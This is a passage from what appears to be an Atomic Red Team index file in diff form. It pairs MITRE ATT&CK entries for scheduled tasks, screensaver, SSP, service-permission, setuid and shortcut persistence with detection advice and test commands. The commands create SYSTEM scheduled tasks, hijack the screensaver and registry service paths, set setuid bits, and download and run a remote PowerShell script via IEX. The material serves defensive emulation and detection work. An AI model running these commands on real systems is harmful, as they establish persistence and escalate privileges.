Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). + id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9 + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. 
Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. + + Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) + + * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered + * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated + * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted + * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created + * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled + * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) + + Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. 
+ x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - Windows + identifier: T1053.005 + atomic_tests: + - name: Scheduled Task Startup Script + auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 + description: | + Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view + the tasks, open the Task Scheduler and look in the Active Tasks pane. + supported_platforms: + - windows + executor: + command: | + schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" + schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" + cleanup_command: | + schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 + schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1 + name: command_prompt + elevation_required: true + - name: Scheduled task Local + auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 + description: 'Upon successful execution, cmd.exe will create a scheduled task + to spawn cmd.exe at 20:10. + +' + supported_platforms: + - windows + input_arguments: + task_command: + description: What you want to execute + type: String + default: C:\windows\system32\cmd.exe + time: + description: What time 24 Hour + type: String + default: 72600 + executor: + name: command_prompt + elevation_required: false + command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} + +' + cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 + +' + - name: Scheduled task Remote + auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd + description: | + Create a task on a remote system. + + Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. 
+ supported_platforms: + - windows + input_arguments: + task_command: + description: What you want to execute + type: String + default: C:\windows\system32\cmd.exe + time: + description: What time 24 Hour + type: String + default: 72600 + target: + description: Target + type: String + default: localhost + user_name: + description: 'Username to authenticate with, format: DOMAIN\User' + type: String + default: DOMAIN\user + password: + description: Password to authenticate with + type: String + default: At0micStrong + executor: + name: command_prompt + elevation_required: true + command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN + "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} + +' + cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} + /TN "Atomic task" /F >nul 2>&1 + +' + - name: Powershell Cmdlet Scheduled Task + auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd + description: | + Create an atomic scheduled task that leverages native powershell cmdlets. + + Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + $Action = New-ScheduledTaskAction -Execute "calc.exe" + $Trigger = New-ScheduledTaskTrigger -AtLogon + $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest + $Set = New-ScheduledTaskSettingsSet + $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set + Register-ScheduledTask AtomicTask -InputObject $object + cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false + >$null 2>&1 + +' + - name: Task Scheduler via VBA + auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 + description: | + This module utilizes the Windows API to schedule a task for code execution (notepad.exe). 
The task scheduler will execute "notepad.exe" within + 30 - 40 seconds after this module has run + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" + name: powershell + - name: WMI Invoke-CimMethod Scheduled Task + auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b + description: 'Create an scheduled task that executes notepad.exe after user + login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing + as Register-ScheduledTask cmdlet behind the scenes. 
+ +' + supported_platforms: + - windows + executor: + name: powershell + elevation_required: true + command: | + $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml") + Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } + cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false + >$null 2>&1 + +' + T1053: + technique: + id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task/Job + description: |- + Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) + + Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). + external_references: + - source_name: mitre-attack + external_id: T1053 + url: https://attack.mitre.org/techniques/T1053 + - external_id: CAPEC-557 + source_name: capec + url: https://capec.mitre.org/data/definitions/557.html + - url: https://technet.microsoft.com/en-us/library/cc785125.aspx + description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved + June 8, 2016. 
+ source_name: TechNet Task Scheduler Security + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-20T16:31:11.405Z' + created: '2017-05-31T21:30:46.977Z' + x_mitre_platforms: + - Windows + - Linux + - macOS + - Containers + x_mitre_remote_support: true + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. \n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement." 
+ x_mitre_data_sources: + - 'File: File Creation' + - 'Container: Container Creation' + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Prashant Verma, Paladion + - Leo Loobeek, @leoloobeek + - Travis Smith, Tripwire + - Alain Homewood, Insomnia Security + x_mitre_version: '2.1' + x_mitre_is_subtechnique: false + atomic_tests: [] + T1546.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.002 + url: https://attack.mitre.org/techniques/T1546/002 + - source_name: Wikipedia Screensaver + description: Wikipedia. (2017, November 22). Screensaver. Retrieved December + 5, 2017. + url: https://en.wikipedia.org/wiki/Screensaver + - source_name: ESET Gazer Aug 2017 + description: 'ESET. (2017, August). Gazing at Gazer: Turla’s new second stage + backdoor. Retrieved September 14, 2017.' + url: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Screensaver + description: |- + Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. 
+ + The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: + + * SCRNSAVE.exe - set to malicious PE path + * ScreenSaveActive - set to '1' to enable the screensaver + * ScreenSaverIsSecure - set to '0' to not require a password to unlock + * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed + + Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) + id: attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-23T12:23:04.955Z' + created: '2020-01-24T13:51:01.210Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior. + + Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated. 
+ x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_contributors: + - Bartosz Jerzman + x_mitre_platforms: + - Windows + identifier: T1546.002 + atomic_tests: + - name: Set Arbitrary Binary as Screensaver + auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 + description: 'This test copies a binary into the Windows System32 folder and + sets it as the screensaver so it will execute for persistence. Requires a + reboot and logon. + +' + supported_platforms: + - windows + input_arguments: + input_binary: + description: Executable binary to use in place of screensaver for persistence + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f + shutdown /r /t 0 + name: command_prompt + elevation_required: true + T1547.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.005 + url: https://attack.mitre.org/techniques/T1547/005 + - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html + description: Graeber, M. (2014, October). Analysis of Malicious Security Support + Provider DLLs. Retrieved March 1, 2017. + source_name: Graeber 2014 + - url: https://technet.microsoft.com/en-us/library/dn408187.aspx + description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. + Retrieved June 24, 2015. 
+ source_name: Microsoft Configure LSA + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Security Support Provider + description: |- + Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. + + The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) + id: attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:42:48.910Z' + created: '2020-01-24T17:16:11.806Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys. + Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 + R2 may generate events when unsigned SSP DLLs try to load into the LSA by + setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\LSASS.exe with AuditLevel = 8. 
(Citation: Graeber + 2014) (Citation: Microsoft Configure LSA)' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_platforms: + - Windows + identifier: T1547.005 + atomic_tests: + - name: Modify SSP configuration in registry + auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e + description: Add a value to a Windows registry SSP key, simulating an adversarial + modification of those keys. + supported_platforms: + - windows + input_arguments: + fake_ssp_dll: + description: Value added to registry key. Normally refers to a DLL name + in C:\Windows\System32. + type: String + default: not-a-ssp + executor: + command: | + # run these in sequence + $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' + $SecurityPackagesUpdated = $SecurityPackages + $SecurityPackagesUpdated += "#{fake_ssp_dll}" + Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated + + # revert (before reboot) + Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages + name: powershell + elevation_required: true + T1574.010: + technique: + created: '2020-03-12T20:43:53.998Z' + modified: '2020-09-16T19:10:04.262Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd + description: |- + Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. 
These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. + + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. + name: Services File Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.010 + url: https://attack.mitre.org/techniques/T1574/010 + - external_id: CAPEC-17 + source_name: capec + url: https://capec.mitre.org/data/definitions/17.html + x_mitre_platforms: + - Windows + x_mitre_detection: "Look for changes to binaries and service executables that + may normally occur during software updates. If an executable is written, renamed, + and/or moved to match an existing service executable, it could be detected + and correlated with other suspicious behavior. Hashing of binaries and service + executables could be used to detect replacement against historical data.\n\nLook + for abnormal process call trees from typical processes and services and for + execution of other commands that could relate to Discovery or other adversary + techniques. 
" + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + atomic_tests: [] + T1574.011: + technique: + created: '2020-03-13T11:42:14.444Z' + modified: '2020-09-16T19:07:48.590Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c + description: "Adversaries may execute their own malicious payloads by hijacking + the Registry entries used by services. Adversaries may use flaws in the permissions + for registry to redirect from the originally specified executable to one that + they control, in order to launch their own code at Service start. Windows + stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. + The information stored under a service's Registry keys can be manipulated + to modify a service's execution parameters through tools such as the service + controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), + or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys + is controlled through Access Control Lists and permissions. (Citation: Registry + Key Security)\n\nIf the permissions for users and groups are not properly + set and allow access to the Registry keys for a service, then adversaries + can change the service binPath/ImagePath to point to a different executable + under their control. 
When the service starts or is restarted, then the adversary-controlled + program will execute, allowing the adversary to gain persistence and/or privilege + escalation to the account context the service is set to execute under (local/domain + account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also + alter Registry keys associated with service failure parameters (such as FailureCommand) + that may be executed in an elevated context anytime the service fails or is + intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: + Tweet Registry Perms Weakness) " + name: Services Registry Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.011 + url: https://attack.mitre.org/techniques/T1574/011 + - external_id: CAPEC-478 + source_name: capec + url: https://capec.mitre.org/data/definitions/478.html + - source_name: Registry Key Security + url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. + Retrieved March 16, 2017. + - source_name: Kansa Service related collectors + url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html + description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and + analysis. Retrieved October 10, 2019.' + - source_name: Tweet Registry Perms Weakness + url: https://twitter.com/r0wdy_/status/936365549553991680 + description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved + April 9, 2018." + - source_name: Autoruns for Windows + url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns + description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. + Retrieved March 13, 2020. 
+ x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + - 'Command: Command Execution' + x_mitre_detection: |- + Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. + + Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. 
+ x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Application control + identifier: T1574.011 + atomic_tests: + - name: Service Registry Permissions Weakness + auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a + description: | + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service check + type: String + default: weakservicename + executor: + command: | + get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL + get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL + name: powershell + - name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: 'Change Service registry ImagePath of a bengin service to a malicious + file + +' + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: "%windir%\\system32\\win32calc.exe" + malicious_service_path: + description: malicious service path + type: String + default: "%windir%\\system32\\cmd.exe" + dependency_executor_name: powershell + dependencies: + - description: 'The service must exist (#{weak_service_name}) + +' + prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + +' + executor: + command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" + /f /v ImagePath /d "#{malicious_service_path}" + +' + 
cleanup_command: 'sc.exe delete #{weak_service_name} + +' + name: command_prompt + T1548.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1548.001 + url: https://attack.mitre.org/techniques/T1548/001 + - url: http://man7.org/linux/man-pages/man2/setuid.2.html + description: Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. + Retrieved September 21, 2018. + source_name: setuid man page + - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ + description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware + is hungry for credentials. Retrieved July 3, 2017. + source_name: OSX Keydnap malware + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Setuid and Setgid + description: |- + An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. + + Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. 
+ + Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware). + id: attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-27T00:43:58.149Z' + created: '2020-01-30T14:11:41.212Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Monitor the file system for files that have the setuid or + setgid bits set. Monitor for execution of utilities, like chmod, and their + command-line arguments to look for setuid or setguid bits being set. + x_mitre_data_sources: + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + x_mitre_platforms: + - Linux + - macOS + identifier: T1548.001 + atomic_tests: + - name: Make and modify binary from C source + auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 + description: 'Make, change owner, and change file attributes on a C source code + file + +' + supported_platforms: + - macos + - linux + input_arguments: + payload: + description: hello.c payload + type: path + default: PathToAtomicsFolder/T1548.001/src/hello.c + executor: + command: | + cp #{payload} /tmp/hello.c + sudo chown root /tmp/hello.c + sudo make /tmp/hello + sudo chown root /tmp/hello + sudo chmod u+s /tmp/hello + /tmp/hello + cleanup_command: | + sudo rm /tmp/hello + sudo rm /tmp/hello.c + name: sh + elevation_required: true + - name: Set a SetUID flag on file + auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 + description: 'This test sets the SetUID flag on a file in Linux and macOS. 
+ +' + supported_platforms: + - macos + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetUID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + sudo touch #{file_to_setuid} + sudo chown root #{file_to_setuid} + sudo chmod u+s #{file_to_setuid} + cleanup_command: 'sudo rm #{file_to_setuid} + +' + name: sh + elevation_required: true + - name: Set a SetGID flag on file + auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c + description: 'This test sets the SetGID flag on a file in Linux and macOS. + +' + supported_platforms: + - macos + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetGID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + sudo touch #{file_to_setuid} + sudo chown root #{file_to_setuid} + sudo chmod g+s #{file_to_setuid} + cleanup_command: 'sudo rm #{file_to_setuid} + +' + name: sh + elevation_required: true + T1547.009: + technique: + id: attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179 + description: |- + Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. + + Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. 
+ name: Shortcut Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.009 + url: https://attack.mitre.org/techniques/T1547/009 + - external_id: CAPEC-132 + source_name: capec + url: https://capec.mitre.org/data/definitions/132.html + - source_name: BSidesSLC 2020 - LNK Elastic + url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ + description: French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger + Than Its Weakest LNK. Retrieved November 30, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-13T21:30:24.555Z' + created: '2020-01-24T19:00:32.917Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - David French, Elastic + - Bobby, Filar, Elastic + - Travis Smith, Tripwire + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: |- + Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections. 
